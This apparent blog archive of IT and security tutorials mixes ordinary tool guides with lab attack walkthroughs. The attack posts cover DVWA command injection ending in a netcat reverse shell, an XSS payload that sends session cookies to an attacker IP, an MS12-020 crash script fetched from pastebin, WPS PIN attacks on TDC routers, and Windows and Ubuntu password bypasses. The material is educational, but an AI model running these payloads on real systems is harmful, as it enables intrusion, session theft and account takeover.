Process Explorer

logo

Process Explorer is like Task Manager on drugs. I have been using it for years, and every time I decide to get to the bottom of it, I get sidetracked because it has so many uses. In this tutorial, we will have a look at some of the different task Process Explorer can be used for.

In Task Manager it is possible to show which process is running, who much memory, CPU they are consuming etc. Process Explorer does the same, but is much more specific in what kind of process or service it is, which process spawned the process, which DLL and handles it uses etc. The main interface shows a tree structure of the different process running on the system. The processes marked with red is services and the blue are “own Process” – process owned by the user you are logged in the system with.

PE1_edited

Hovering over a process like svhost.exe reveals a tooltip showing which services this contains. Since svhost is a shared service processes it contains multiple services sharing that process. I Task manager it can be hard to identify what services in running under a svhost process, which is also why some malware sometimes disguise itself as svhost.exe.

Process Explorer also shows interrupts – which basely is the time the system spend waiting for different hardware. If a computer has a defective piece of hardware or a driver issue this can cause a so called Interrupt storm, using up the systems CPU, and you would have no way of seeing this in Task Manager.

Another feature is that you can drag and drop a bullseye icon to any windows application, and Process Explorer will identify the process running that application. An example where this would be useful would be malware removal, where process is often hidden in order to fool the user.

PE2_edited

The Columns can be highly customized to this a range of information on the different processes, let’s add a few which I found useful.

1. Download and install Process Explorer

2. Start Process Explorer and right click the top bar and click Select Columns…

The Select Columns dialog box opens.

3. In the Process Image tab mark the tow check boxes Command Line and Autostart Location and press OK

PE3_edited

These two options add two columns to the main interface. The first one shows the command line option to start that specific process. This could for example be useful if you wanted to script something and didn’t know which parameters a specific process should run with.

PE4_edited

The other one shows how that process was started, this could be started from a registry key in Windows registry database, from Task Scheduler or just a link in the startup folder.

PE5_edited

Let’s say that you would like to make some changes to a registry key which starts an application on system startup.

4. Double click the process – here skype.exe

The Skype.exe:1720 Properties dialog box opens.

5. On the Image tab under Autostart location press the explore button

PE6_edited

The registry editor opens at the exact location so you will be able to edit the key. We want to edit the key which starts the Skype application and add a parameter so it will start minimized.

6. Double click the register key Skype

The Edit string dialog box opens.

7. Add the parameter /minimized in the in the Value data field and click OK

PE7_edited

8. Close the registry editor

The next time Windows starts up the Skype application should start minimized instead of in a full Window.

PE8

You can also use Process Explorer to find out what process is locking up a file. If you are for example trying to delete a folder and get hit by the Folder in use alert you can identify which program is using this folder.

9. In Process Explorer press Ctrl + F

The Process Explorer search dialog box opens

10. Enter the patch of the folder you trying to delete – Here C:\test and click Search

Process Explorer will tell you which process is holding the folder, so that you can shut it down, and be able to delete it.

PE9_edited

Another feature in process explorer is the possibility to restart or suspend a process. Sometimes if buggy software or even part of Windows itself hangs or crashes, it’s much easier to restart the process than to kill it and start it again manually.

11. Right click the process – here Explorer.exe

12. Click Restart

PE10_edited

I don’t use the suspend option that often, but it is a nice feature which can lock application completely down. Let’s say the system gets some sort of malware which spawns new processes and shifts process to avoid detection. With the suspend feature you will be able to lock down the process and maybe figure out what it’s doing and how to remove it. I recommend this video on would process explorer can be used for malware removal.

13. Right click the process – here calc.exe

14. Click Suspend

The calculator application is now completely down and cannot be accessed in any way, or interact with your system in any way. To resume the application right click the process and click Resume.

PE11_edited

This was a few examples of how Process Explorer can be put to use. You can dig much deeper with this tool, and it’s a must-have for advanced system debugging.

Share Button
Posted in Windows | Leave a comment

Local File Inclusion & Remote Command Execution

logo

Local File Inclusion (LFI) is an exploit, which involves gaining access to local system files of a web server, though a website. The vulnerability occurs when a website does not have proper validating on which files it can and cannot include. From an attackers point of view the gold of LFI is often to gain vital system information or to do Remote Code Execution (RCE). The purpose of this tutorial is to show the danger of LFI and RCE and why you should always sanitized you page include when building a website.
In this scenario, we have a Kali Linux box acting as webserver on the IP address 192.168.1.13 and an attacking computer running Windows 8.1 address 192.168.1.9. We will be using the penetration testing application Damn Vulnerable Web Application (DVWA), which have already been installed on the Linux box.

1. Navigate to your DVWA website – here 192.168.1.13

2. Login with the username admin and password password

3. Click the File Inclusion button

Note that DVWA has three different security levels, in order to use this exploit the security need to be set to low. If we click the View Source button DWVA even shows the source code for the security levels regarding to file inclusion.

  • The Low File Inclusion Source basically allows you to get any file you want. Of course, you might be limited by the operation system, but the PHP code itself had no restriction to which files you can include.
  • Medium File Inclusion Source is the same, apart from it will not let you add anything that start with http and https.
  • Finally, the High File Inclusion Source does not allow you to include anything else the file include.php and if you try the error ERROR: File not found! will be displayed.
  • LFI2

    4. Change end of the URL from page=include.php to page=/etc/passwd

    LFI1

    The content of the local file passwd located in the /etc/ directory is now displayed on the screen. This file contains information on all the users on the server. Various other files could be of interest – especially log and error files because these can be manipulated by the requested URL site and POST parameter. In this scenario we will however not use LFI for gaining RCE. Instead, I encourage you to have at look at this video
    by Chris Andrè Dale.

    For RCE we be exploiting another vulnerability. Again – In order to do this, the security level needs to be set to low. The function Ping for FREE in DWVA allow us to execute the ping command though the website. However, if not properly filtered we can trick the website into executing other commands as well.

    5. Click the Command Execution button

    6. Enter 8.8.8.8; pwd and click the Submit button

    RCE1

    What we did was tell the site to ping the IP 8.8.8.8 and ; execute the command pwd (print working directory). As you can see both commands are executed successfully and the result of pwd is shown as /var/www/vulnerabilities/exec. Now let’s try to use this vulnerability to create a remote shell from the Kali Linux server to the attacking Windows 8.1 computer. For this to work both of them needs to have Netcat installed. Further reading on using Netcat can be done in previous Netcat tutorial.

    7. From the attacking computer open a command prompt and type nc -lvp 7777

    8. In DVWA enter 8.8.8.8; nc -nv 192.168.1.9 7777 -e /bin/bash and click the Submit button

    In the command prompt, we can now see that a connection from 192.168.1.13 is initiated. We now have remote shell access to the server. Note that the website also keeps loading because it is still in the process of executing the Netcat command. It will stay like that until we end the connection.

    9. Type pwd and press Enter

    10. Type whoami and press Enter

    RCE3

    The server responds to the commands showing which directory it currently is in, and which user we are logged in as. From here on out, I can’t say what a real attacker would do, but probably not anything nice.

    Share Button
    Posted in Linux, Networking, Security, Windows | Leave a comment

    MS12-020 RDP Vulnerability PoC & Analysis

    In March 2012 a security breach was released regarding a vulnerability in the Remote Desktop Protocol (RDP). The vulnerability related to almost all Windows platforms, and was later released under CVE-2012-0002 and MS12-020

    logo

    In short, the vulnerability enables an attacker to send a sequence of specially crafted RDP packets, which can result in remote code execution. It can however only be done if remote desktop is enabled on the system and Network Level Authentication (NLA) disabled. There is a lot of technical details on the subject – Which, to be honest, I don’t understand to the full extent of.

    The story goes that the Security researcher Luigi Auriemma found and reported this vulnerability to Zero Day Initiative (ZDI), who then reported it to Microsoft. But before Microsoft ever released a patch for the vulnerability, Chinese hackers had somehow gotten hold of Auriemmas code, and released their proof-of-concept (PoC), showing the vulnerability to the world. Luigi Auriemmas original PoC, which is as simple as sending a specially crafted packet via netcat, can be found here.

    An improved version of the Chinese PoC was later released as a Python script, which is enables an attacker to make the target machine crash with a Blue Screen of Death (BSOD). All it takes is the ability to run the script and the IP address of the target machine.

    The purpose of this tutorial it purely educational and serves to prove the importance of always keeping your systems up to date with the latest security patches. In this scenario we have an Windows 2008 R2 server running on the IP address 192.168.1.17 and an attacking computer running Kali Linux on the IP address 192.168.1.20

    First of all let’s check if Windows Server is acutely vulnerable. From Microsoft we know that remote Desktop must be enabled without NLA, and the patch which fixes this vulnerability for Server 2008 R2, is called KB2621440.

    1. On the Windows server right click Computer and click Properties

    2. Click Remote Settings

    3. Check that the radio button Allow Connections from computers running any version of Remote Desktop (Less Secure) is selected.

    RDPkill1

    Now let’s check that the KB2621440 patch is not already installed.

    4. Open up a command prompt and type wmic qfe | find “KB2621440”

    RDPkill2

    No information is given which means that the patch isn’t installed on the server. So all the criterias for the vulnerability is met. Now let’s go to the attackers point of view.

    5. On the Kali Linux machine open a terminal at type wget -O RDPkill.py http://pastebin.com/raw.php?i=G99npvDy

    6. Type chmod 777 RDPkill.py

    RDPkill3

    What we just did, was to download the code for the python script from pastebin, and placed it in a file called RDPkill.py. Then we made the script executable by setting the permissions for the file with chmod. All that is left now is to point the script to the IP address of the Windows server and fire away.

    7. Type python RDPkill.py 192.168.1.17

    RDPkill4

    Game over! The script sends a few packets towards the unpatched server, and down she goes.

    Let’s try to have a closer look at what happened. This is somewhat out of my league, but I gave it a try anyway. Please feel free to correct me if I’m way off here. This is the description giving by Luigi Auriemma:

    There is an use-after-free vulnerability located in the handling of the maxChannelIds field of the T.125 ConnectMCSPDU packet (offset 0x2c of the provided proof-of-concept) when set to a value minor/equal than 5.
    The problem happens during the disconnection of the user started with RDPWD!NM_Disconnect while the effect of the possible code execution is visible in termdd!IcaBufferAlloc (or termdd!IcaBufferAllocEx on Windows 7/2008) after termdd!IcaGetPreviousSdLink returns an invalid memory pointer.

    RDPkill5

    The script itself contains a small amount of python. Mostly it’s just the payload of the packets that is being sent. I’m not sure, but a wild guess would be that that “Fuck you Chelios” packet is the one which delivers the final dead punch to the server. I could use python and ndisasm to disassemble the payload of the packet like so:

    RDPkill6

    But really I’m not that good at reading machine code that I understand what this actually does. Instead, let’s have a look at the traffic in Wireshark. Filtering away all other traffic then the one from the attacking computer to the server and vice versa.

    RDPkill7

    I believe that this is the so called “Fuck you Chelios” packet, and the 0x2c offset in the maxChannelIds field, as in Luigi Auriemmas description.

    RDPkill8

    Following that, we have a bunch of T.125 packets from the server to the attacker containing the field rt-no-such-user. Finally we have an RST,ACK packet from the server which indicate that the connection had been closed. This again fits with the description saying the problem happens during the disconnection of the user.

    RDPkill9

    The information given in the BSOD, that the cause of the problem is in the termdd.sys file (which is a Remote Desktop Server Driver) is also valid. Again this matches the description which says that the problem is related to termdd!IcaBufferAlloc and termdd!IcaGetPreviousSdLink. With my knowledge this is as far as I get with this analyses.

    RDPkill10

    Finally, installing the security update KB2621440 through Windows update closes this vulnerability. Thereby, hopefully, proving my point of always keeping your system up to date.

    Share Button
    Posted in Linux, Networking, Security, Windows | Leave a comment

    ActivPasswordChanger

    In a former tutorial, I showed how to hack Windows 7 Account Password without any tools at all. In that tutorial I mentioned that there also where tools available to do this. Since I just lost the password to one of my virtual machines, I decided to make a quick tutorial on how to use such a tool. I will be using the tool Activpasswordchanger.

    logo

    This is real basic stuff, I know – but it shows you that with the right tools, getting access to an system account is child’s play unless the system disk is encrypted. To do this you need a bootable disk containing Activpasswordchanger. Furthermore you need to set your BIOS to boot form the CD-ROM drive.

    1. Boot from the CD-ROM drive and press 0 and the Enter

    Activpasss1

    We will be presented to a menu that allows us to make Activpasswordchanger automatically search for the MS SAM database, which is where Windows stores it’s users passwords.

    2. Press 2 and then Enter

    Activpasss2

    The software will scan the disk for SAM databases, this can take a little while depending of the size of the disk. Ones it has been found, select the database to clear the users password.

    3. Press Enter

    Activpasss3

    In this scenario, we only have an Administrator and a Guest account on the system. We want to clear the Administrator password so we choose this account.

    4. Press 0 and then Enter

    Activpasss4

    We are now present to a menu with a few option for this account, the option Password never expires and Clear this User’s Password is pre-selected so all we have to do is accept.

    5. Press Y an the Enter

    Activpasss5

    The password has now been removed, all we have to do now is to exit the software and reboot

    6. Press Esc, Esc, Esc to exit, remove disk and restart

    The system now starts up and logs on automatically without a password.

    Activpasss6

    Share Button
    Posted in Security, Windows | 3 Comments

    FreeRDP – RD Gateway client for Linux

    logo
     
    If you are Googling for software that allows you to use remote desktop from a Linux OS through a RD Gateway to another server -? Stop! I spend hours doing the same with no luck. I tried out a bunch of tools with no luck either. Here is some of the tools I tried, which does NOT support this function:

    ? Remotedesktop Client
    ? Remote Desktop Viewer
    ? Remmina Remote Desktop Client
    ? 2X Client / Remote Desktop
    ? KRDC
    ? Jump Desktop
    ? Running MS mstsc through Wine

    I have previously used iTap Mobile to set up connections through a Remote Gateway (also known as RD Gateway or TS Gateway) from a Mac. I read this could also be used for Linux OS?s. But when I went to their site, it turns out that iTap mobile has been discontinued because Microsoft released a new Microsoft Remote Desktop app. This Desktop App works for Windows, Mac and Android, but Linux is not mentioned anywhere. So I wrote the iTap team asking them for advice:

    Hi iTap team

    I’m looking for software which can connect me through an RD Gateway
    (or TS gateway) to a terminal server. I can see you are referring to the new “Microsoft Remote Desktop app”
    for Macs and Android.

    But what about Linux users like myself, is there an alternative to iTap now that you guys discontinued iTap?

    This was their reply:

    Hello

    Thank you very much for your interest in iTap mobile RDP.
    Unfortunately, not that I know of. As far as I know iTap mobile RDP was the only RDP client for Linux that offered RD Gateway support.

    We are very sorry for the inconvenience.
    Best regards,
    Stefan

    So what did I do ? turned to the wonderful world of opensource software. FreeRDP is an awesome project started by Awake Coding aka Marc-André Moreau. It is still in development so bugs and missing documentation is to be expected. This tutorial will show you how to compile and use FreeRDP to connect to through a RD Gateway to a terminal server from Ubuntu 13.10 32 bit.

    First thing is to install Git, if you already have this installed you can skip this step.

    1. Open a terminal an type sudo apt-get install git

    Ones we have Git installed, let?s get the source files from GitHub

    2. Type git clone git://github.com/FreeRDP/FreeRDP.git

    FreeRDP1

    3. Type cd FreeRDP

    We also need a bunch of dependencies for compiling and running FreeRDP

    4. Type the following and press Enter

    sudo apt-get install build-essential git-core cmake libssl-dev libx11-dev libxext-dev libxinerama-dev \
    libxcursor-dev libxdamage-dev libxv-dev libxkbfile-dev libasound2-dev libcups2-dev libxml2 libxml2-dev \
    libxrandr-dev libgstreamer0.10-dev libgstreamer-plugins-base0.10-dev

    FreeRDP2

    Now that we have all we need, the makefile must be generated.

    5. Type cmake -DCMAKE_BUILD_TYPE=Debug -DWITH_SSE2=ON .

    FreeRDP3

    Finally start the build

    6. Type make

    FreeRDP4

    Ones the installer had been build we can start installing the software itself

    7. Type sudo make install

    FreeRDP5

    It will take a while to install but hopefully will without any errors. Ones FreeRDP is installed, there is just a little tweaking needed. We need to create a config file for FreeRDP which tells it where the FreeRDP library is placed.

    8. Type sudo nano /etc/ld.so.conf.d/freerdp.conf

    9. Inset the line /usr/local/lib/freerdp

    10. Save and exit the file

    FreeRDP6

    We need to check that the line we inserted is read correctly by the system. For this we start the ldconfig function, and check the path with the which command.

    11. Type sudo ldconfig

    12. Type which xfreerdp

    FreeRDP7

    13. Start FreeRDP by typing xfreerdp

    FreeRDP should now be installed correctly. If you have any problems doing this, please check the wiki a GitHub.

    Let?s try using FreeRDP to connet to a terminal server though a RD Gateway server. The syntax is like this:

    xfreerdp /v:WORKSTATION /d:DOMAIN /u:USERNAME /p:PASSWORD /g:GATEWAY 
    /gd:GATEWAYDOMAIN /gu:GATEWAYUSERNAME /gp:GATEWAYPASSWORD

    But since I?m using then same account to identify myself to the RD Gateway, and the terminal server I only need to give one username and password.

    14. Type xfreerdp /v:WORKSTATION /d:DOMAIN /u:USERNAME /p:PASSWORD /g:GATEWAY

    15. When asked if you trust the certificate press y

    FreeRDP8

    So I get error that the Gateway certificate has changed. Someone has suggested that it is a bug in FreeRDP, because it has to handle both the RD gateways certificate and the terminal servers certificate. Anyway it is an easy fix since we can just use the /cert-ignore option.

    16. Type xfreerdp /cert-ignore /v:WORKSTATION /d:DOMAIN /u:USERNAME /p:PASSWORD /g:GATEWAY

    FreeRDP9

    Success ? we have connected though the RD gateway to a Terminal server in a protected environment. Remember though that FreeRDP is still in development, so it might be buggy. If anybody knows other software or an easier way to connect to a Terminal Server though an RD Gateway please let me know.

    Share Button
    Posted in Linux, Networking | 32 Comments

    Banner Grabbing and Emailing via Telnet

    logo

    Telnet is a old network protocol which has been around longer then the internet. It was created for the purpose of remote access for network resources. It sends its data in plain text and is therefore highly insecure. Nowadays it has largely been replaced by the encrypted Secure Shell (SSH). Telnet can however be a useful tool for debugging purposes.

    Other protocols which were developed in the early days of the Internet is also quite insecure, because their details is send in plain text as well. Known protocols such as HTTP, FTP, SMTP all does this. This does also mean that there is nothing stopping you from using Telnet to communicate via these protocols. It might be impractical – but in a debugging situation, it is nice to be able to fire up telnet and, for instance, check if you mail server is responding correctly.

    This tutorial will show how to do Banner Grabbing and how use telnet to send an email via the SNMP Protocol. Since the default telnet client in Windows has been disabled since Windows Vista, the first thing you got do is enable it.


    Banner Grabbing with telnet


    Telnet can be uses to get information about a server. By sending a request via telnet to an open port on the server, it will give back relevant information about itself. This information can be OS, services and application versions. From an intruder’s point of view, this information can be used to find systems running OS or services with known exploits. this is also known as Banner Grabbing

    Note that when using Windows Telnet client there is no cursor caret, so you will not be able to see what you are typing. Furthermore, you needed to execute your command by hitting the Enter key twice. This tutorial can also be done with software such as Putty, which is a little easier to navigate.

    1. Open a command prompt and type the following commands one by one followed by pressing Enter

    
    telnet ifconfig.dk 80
    HEAD / HTTP/1.0
    

    bannergrabbing

    What we did was telnet to the server, which hosts ifconfig.dk on port 80. Then send a HEAD request to get a HTTP header from the server. Here we can see it is running Apache 2.2.16 on a Debian OS. For the fun of it, let’s try requesting the site itself.

    2. Type the following commands one by one followed by pressing Enter

    
    telnet ifconfig.dk 80
    GET / HTTP/1.1
    Host: ifconfig.dk
    

    bannergrabbing2

    Again we telnet to the server hosting ifconfig.dk on port 80. But this time we use the GET command, also we define that it’s the host ifconfig.dk we are requesting. I spared you for a bunch of HTML, but it is there.


    Sending mails via telnet


    First we need to find the name of the mail server. This can be done with the tool nslookup.

    1. Open a command prompt and type the following commands one by one followed by pressing Enter

    
    nslookup
    set type=mx
    gmail.com
    

    nslookup_edited

    Here we defined that we would like to see the MX records for the domain google.com. This means the mail servers used for the domain. They are defined by priority where the lowest number means the highest priority. For this tutorial, we will use the mail server address alt1.gmail-smtp-in.l.google.com.

    2. Type the following commands one by one followed by pressing Enter

    
    Telnet alt1.gmail-smtp-in.l.google.com 25
    helo mx.google.com
    mail from:
    rcpt to:
    data
    subject: testmail
    This is just a test
    .
    

    telnetMail_edited

    What we just did was to telnet to one of googles mailservers on port 25, which is the port SMTP uses. We greed the server helo, and it responds at your service. Then we tell the server what mail address the mail is coming from and which address to send it too. The server responds OK. Then we tell the server we would like to input data – it responds Go ahead. We enter the text for the mail and finally sends the mail with a . Let’s check our mailbox and see if we received the mail.

    telnetmail2_edited

    Credit goes here and here.

    Share Button
    Posted in Networking, Windows | Leave a comment

    Defacing and Cookie Stealing with Cross-site scripting

    In a cross-site scripting attack (XSS), the attacker inject scripts into input forms, search fields or site URLs, in order to make a website do different tasks when viewed by users. The object of this tutorial is to show the dangers of XSS attacks, why you should never trust user input and always sanitize your input forms, when building a web page.

    logo2

    For this tutorial I will be using Damn Vulnerable Web Application (DWVA), which is a webpage designed to do penetration testing in your own environment, in a safe and legal way. This tutorial will not include the steps needed to set up DWVA*

    1. Navigate to your DWVA website – here http://localhost/DVWA-1.0.8/login.php

    2. Login with the username admin and password password

    3. Click the DVWA Security button

    4. Select low in the drop down list and press the Submit button

    DVWA1_edited

    The XSS test

    DVWA is now set up to not sanitize any input to forms, which means that absolutely anything you enter will be approved and placed on the webpage.

    1. Click the XSS stored button

    Here we have a simple guestbook where visitors can enter a message, which will be displayed for everyone to see. The idea is of cause, for the user to input some text, which the next users can read. The message can however, contain small scripts telling the next users webbrowser to execute certain commands. The first attack is to test if the site actually is vulnerable to XSS. We will do this with a small javascript which calls the alert function to open up a alert message in the users webbrowser.

    2. Click in the field Name and type test

    3. Click in the field Message and type:

    <script>alert(1);</script>

    4. Click the Sign Guestbook button

    XSStest1_edited

    The signed guestbook now appears not to contain any text in the message field. That is because the webbrowser reads script is a part of the websites internal code, and not as a user message to be showed in plain text.

    5. Click the XSS stored button again to reload the site

    XSStest2_edited

    A popup called The page localhost says: opens. The content of the popup is 1. This is the result of your webbrowser reading the javascript we wrote earlier. This is quite harmless, but it proves that that the site is vulnerable. DVWA has a nice feature to easily clean the database and thereby also the messages from then guestbook. We are going do this before trying anything else.

    6. Click the Setup button

    7. Click the Create / Reset Database button

    databasesetup_edited

    Defacing with XSS

    Okay so you might be thinking All right – you can make a popup, big deal! Let’s try using XSS to “deface” the guestbook, by redirecting the users to another site. Again we will use javascript to call a function, this time to open up another website.

    1. Click the XSS stored button

    2. Click in the field Name and type Deface

    3. Click in the field Message and type:

    <script>window.location="http://ifconfig.dk";</script>

    4. Click the Sign Guestbook button

    deface1_edited

    Again nothing is showed in the text field because the webbrowser do not think that that script is part of a plaintext comment.

    5. Click the XSS stored button again to reload the site

    deface2_edited

    You will be redirected to the site ifconfig.dk. Every time the users visit the guestbook their webbrowser will redirect them to ifconfig.dk instead of showing the content of the guestbook. Let’s reset the database again, before the next attack.

    6. Go back to http://localhost/DVWA-1.0.8/setup.php and press the Create / Reset Database button

    Cookie stealing with XSS

    Let’s turn it up a notch – in this scenario we have an attacker who is on another computer and has access to our DVWA site, but not as admin. His objective is to set up a XSS attack to steal the admin session cookie, send it to him, and use it to gain access to the admin account.

    In this scenario the server running our DVWA site is a Windows computer with the IP address of 192.168.1.16. The attackers computer is running Backtrack, which has the IP address of 192.168.1.14.

    1. On the Backtrack computer – navigate to the DWVA website at http://192.168.1.16/DVWA-1.0.8/login.php

    2. Login with the username 1337 and password charley

    3. Click the XSS stored button

    4. Click in the field Name and type Cookie

    5. Click in the field Message and type:

    <script>new Image().src="http://192.168.1.14/cookie.php?"+document.cookie;</script>

    6. Click the Sign Guestbook button

    Cookie1_edited

    What this javascript does, is to try to load an image from the backtrack computer. Along with the request for the image it sends the session cookie from the user who views the guestbook comment to the attackers computer. The site cookie.php does not exist on our backtrack computer, in the real world an attacker would probably set up a php site to receive sessions sent and save them to a file. But in this scenario we will just capture the raw traffic sent to the computer. We can do this by setting up a netcat listener to Listen Verbosly on Port 80 on the Backtrack computer.

    7. Open a terminal window and type nc -lvp 80

    We are now all set for the attack. The attacker can only wait for the admin to visit the guestbook. Let’s play the role of the unknowing admin for a moment.

    8. From the Windows computer visit the site http://localhost/DVWA-1.0.8/login.php

    9. Login with the username admin and password password

    10. Click the XSS stored button

    Cookie2_edited

    The unknowing admin will just be shown an empty message with the title Cookie. But behind the scenes a packet containing the session cookie is sent to the attackers computer. Here is what it looks like in Wireshark.

    wireshark_edited

    Right – Let’s put on out back hat and play the role of the attacker again. In the Terminal window we will see that a session has been received. We now want to use this session to gain access to the admin account on the DWVA site. This can be done in a variety of ways – here we are going to use a Firefox plugin called Cookies Manager+.

    Cookie3_edited

    11. On the Backtrack computer open Firefox and install Cookies Manager+

    12. Navigate to the DWVA website at http://192.168.1.16/DVWA-1.0.8/

    13. Press Tools | Cookie Manager+

    The Cookie Manager + tool opens. We now want to replace the session cookie of the user 1337 with the session of the user admin.

    14. Double click the session for the host 192.168.1.16 named PHPSSID

    15. In the Edit cookie window, replace the value in the field Content with the session id captured in the terminal

    Cookie4_edited

    16. Press the Save button to close the Edit Cookie window

    17. Press the Close button to close the Cookie manager+ tool

    18. Press F5 to refresh the page

    Cookie5_edited

    Voila – the attacker has now gained access to the admin account, without ever knowing the password. There is much more to XSS then this, but I think this demonstrates just how dangerous XSS attacks can be. Hopefully web site developers as well as browser developers, will be aware of this danger, so that users can browse sites without being betrayed by their own webbrowsers.

    Notes

    Whether or not users are hit by XSS attacks is very dependent of the webbrowser used. Some browsers block certain types of XSS attacks which others don’t and visa versa. Using a plugin like noscript in your browser helps since no client-side scripts are will be run without your permission.

    *A few pointers for setting up DWVA:
    Edit this file to allow access to the site from other client on you network:
    www\DVWA-1.0.8\.htaccess
    Edit this file to change the maximum characters in the input field:
    www\DVWA-1.0.8\vulnerabilities\xss_s\index.php

    Credits for the use of DWVA and Cookie stealing goes here and here.

    Share Button
    Posted in Linux, Networking, Security, Windows | Leave a comment

    Hack TDC HomeBox in seconds

    logo3

    In one of my previous posts I explained a little bit about the flaw in the WPS system and how to exploit it. To summarize the flaw in the WPS enabled you to bruteforce the eight-digit pin code, and thereby get access to a otherwise secured wireless network. In the meantime then flaw is still there, many manufactures of routers has “fixed” this by limiting the number of WPS attempts to their device before locking up for a certain amount of time. The same is true with TDC HomeBox.

    TDC HomeBox is preconfigured for the typical user with a predefined SSID of HomeBox-xxxx. Where xxxx represent the last four digits of the MAC address. When logging on the first time the users are instructed to use the WPS PIN from a sticker on their router. After that, they are good to go. Do you think that the average user logon to the router and disables WPS afterwards? In other words – There are a hell of a lot preconfigured routers out there, which never gets reconfigured after the initial setup! And here is the fun part – All TDC Homeboxs I have come across seems to accept the WPS PIN 12345670 – the first PIN that the WPS bruteforce application Reaver tries!

    WPShacked

    Of course, I tried contacting TDC regarding this problem. I got in touch with a friendly administrator at TDC Forum who asked me to mail him some details and he would forward them to the proper authorities, from there they would contact me directly. I wrote a long mail, explaining the problem and sent him the same day. A week passed with no response. I wrote the guy asking if he had gotten the mail, and still nothing. It has been a month since I sent the mail – I guess that means TDC thinks it is not relevant information?

    Of cause, I could be wrong and not all TDC HomeBoxes are effected, but I am still to find one that is not. Here are pictures of four total different boxes, which all seems to accept the WPS PIN 12345670 and thereby all hacked within seconds.

    4tuimesfun_edited

    TDC is one of the biggest ISPs in Denmark. Have a look at wireless networks in your area – chances are you have one or more HomeBox-xxxx networks in your area. I my opinion you might as well put up a big sign saying FREE WIFI. If you own one of this boxes youself, please log in and disable WPS.

    Share Button
    Posted in Networking, Security | Leave a comment

    Hack Ubuntu Account Password

    In the tutorial Hack Windows 7 Account Password, I showed that having a account password on a Windows computer does not mean that it is unbreakable. In this tutorial, we are going to have a look at how to do something similar on the Linux based system – Ubuntu, by hacking the GNU GRUB loader.

    loginunsucess_edited

    We have a system running Ubuntu 12.10, which we cannot log in to because we do not have the correct password. The object is to remove the password and gain access.

    1. At boot press Shift to bring up the GRUB loader

    2. Mark the boot option you want to use – here Ubuntu and press e

    GRUB1

    3. Navigate down to the text linux /boot/vmlinuz-3.5

    We are now going to trick the GNU GRUB loader to drop the normal boot process and instead boot straight into a shell with root privileges.

    GRUB3_edited

    4. Change the argument ro to rw

    5. Remove the text splash $vt_handoff

    6. Add the text init=/bin/sh

    GRUB4_edited

    Changing ro (read only) to rw (read write) allow the root account to change system files doing boot instead of just reading the files. We don’t need the line splash $vt_handoff since it has to do with the graphics showed doing a boot. Finally we add the line init=/bin/sh to tell the kernel to execute a shell instead of the standard init.

    7. Press F10 to reboot

    We have rebooted in to a shell, let’s check who we are logged in as.

    8. Type whoami

    Nice, we are logged in as root – Unlimited power is at our fingertips! Now we want to remove the password for the account hegelund. This can be done in a number of ways, in this tutorial we going to do it by editing the password hash directly from the shadow file.

    9. Type nano /etc/shadow

    shell1

    10. Navigate to the desired username – here hegelund

    shell2_edited

    11. Remove the hash value of the password ($hashtype$salt$password$)

    12. Press Ctrl + X to exit

    13. Press Y to save the changes and confirm by pressing Enter

    shell5_edited

    14. Reboot the computer

    15. Chose boot option you want to use – here Ubuntu and press Enter

    The changes made to the GNU GRUB loader is not permanent, so after the reboot the system should boot up as normal.

    16. Log in as the user hegelund without a password

    loginsucess_edited

    The method should work on all Debian based systems using the GNU GRUB loader. This tutorial serves to prove that if you store sensitive information on you system, you should not rely on an account password alone. Credit for the method goes here.

    Share Button
    Posted in Linux, Security | 1 Comment

    Netcat Basics

    logo

    Netcat is an awesome network tool, which can be used for pretty much anything network related. File transfers, remote access, tunneling and network debugging is some of the common tasks it is often used for. Netcat is found for both nix and Windows systems. In this tutorial, we are going be using Netcat as a simple chat client, for file transfers, webserver and remote access. We will be using two systems, a Windows 7 client with the IP of 192.168.1.100 and a Linux client with the IP of 192.168.1.115.

    1. Open an command prompt on the Windows client and type nc –lvp 2222

    This will tell Netcat to start Listing Verbosely on Port 2222. There are no specific reason for using this port, just randomly chosen. We will now ask the Linux client to connect the IP of the Windows client on port 2222.

    2. In a Shell from the Linux client type nc 192.168.1.100 2222

    3. Type Hello World and press Enter

    4. Go back to the Windows Command Prompt and type Hack the Gibson and press Enter

    connection1_edited

    We are able to transfer raw text from one system to another via TCP/IP on a specific port. Let’s try transferring a file instead. We do this by telling Netcat on the Linux client to Listing Verbosely on Port 1717 and output > whatever data transferred to a file called test.txt. Then we ask Netcat on the Windows client to connect to the IP of 192.168.1.115 and input < at file contain some text called test.txt.

    5. On the Linux client type nc -lvp 1717 > test.txt

    6. On the Windows client create a file call text.txt and input the text This is a test

    7. Type nc 192.168.1.100 1717 < test.txt

    The data is now transferred and saved to the file test.txt on the Linux client. Now open up the file and check that the data was transferred.

    filetransfer_edited

    8. Press Ctrl+C to close the open connection

    9. On the Linux client type nano test.txt

    filetransfer2_edited

    We can see that the text This is a test was transferred from the Windows client to the Linux client. Now that we know how to do this, we can try to input a picture on port 80 – the port normally used for web traffic – and thereby use Netcat as a web server. In this tutorial, we are using the picture cool.jpg.

    10. On the Linux client type nc -lvp 80 < cool.jpg

    11. From the windows client open a web browser and go to http://192.168.1.115/

    webserver_edited

    The picture is shown in the web browser. Note that a lot of information about the connection is shown in the terminal window, just like a real web server would log web traffic. We are now going to have a look at how to create a remote shell from the Linux client to the Windows clients’ command prompt. We are going to do this by binding the command prompt to Netcat with the –e cmd.exe parameter. This time we randomly pick the port 1337.

    12. From the Windows client type nc -lvp 1337 -e cmd.exe

    13. From the Linux client type nc 192.168.1.100 1337

    remotecmd_edited

    We now have a remote shell for the Windows system running via Netcat. Now try that the other way around, to make a remote shell to the Linux Clients bash shell from the Windows client. We are going to do this by binding the bash shell with the –e /bin/bach parameter on port 7777.

    14. From the Windows client type nc -lvp 7777

    15. From the Linux client type nc -nv 192.168.1.100 7777 -e /bin/bash

    16. From the Windows client type pwd to confirm the connection was made

    remotebash_edited

    We can see that we are in the /root directory indicating that we do in fact have remote shell access to the Linux client.

    Netcat is often referred to as the TCP/IP Swiss Army knife, since it capabilities is, close to, only limited by the TCP/IP protocol and your imagination. It’s a really handy tool to know how to work with when you are doing anything networking related.

    Share Button
    Posted in Linux, Networking, Windows | Leave a comment